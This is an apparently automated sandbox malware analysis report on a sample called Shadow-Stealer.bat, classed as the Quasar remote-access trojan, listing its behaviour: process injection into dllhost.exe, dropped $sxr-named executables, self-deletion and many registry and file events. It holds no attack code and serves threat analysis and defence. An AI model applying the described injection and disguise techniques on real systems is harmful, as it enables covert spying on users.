Malware Analysis Report

2024-10-19 06:32

Sample ID 240528-ky6nhaee47
Target Shadow-Stealer.bat
SHA256 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags
quasar v2.2.6 | tinsler spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

Threat Level: Known bad

The file Shadow-Stealer.bat was found to be: Known bad.

Malicious Activity Summary

quasar v2.2.6 | tinsler spyware trojan

Suspicious use of NtCreateProcessExOtherParentProcess

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar payload

Quasar RAT

Executes dropped EXE

Deletes itself

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

Runs ping.exe

Uses Task Scheduler COM API

Views/modifies file attributes

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-28 09:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 09:01

Reported

2024-05-28 09:33

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1799s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5052 set thread context of 4804 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 set thread context of 3852 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 4656 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 3340 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 5052 set thread context of 3380 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5052 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 6044 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 5480 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5628 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 4968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5760 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 5364 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5236 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 5732 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5532 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 6064 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887099" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:05:00 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={57EC1572-54E1-45A8-8FEE-66D1A3BEFC90}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000e0c9f43258a1da018955b7015ca1da018955b7015ca1da0114000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
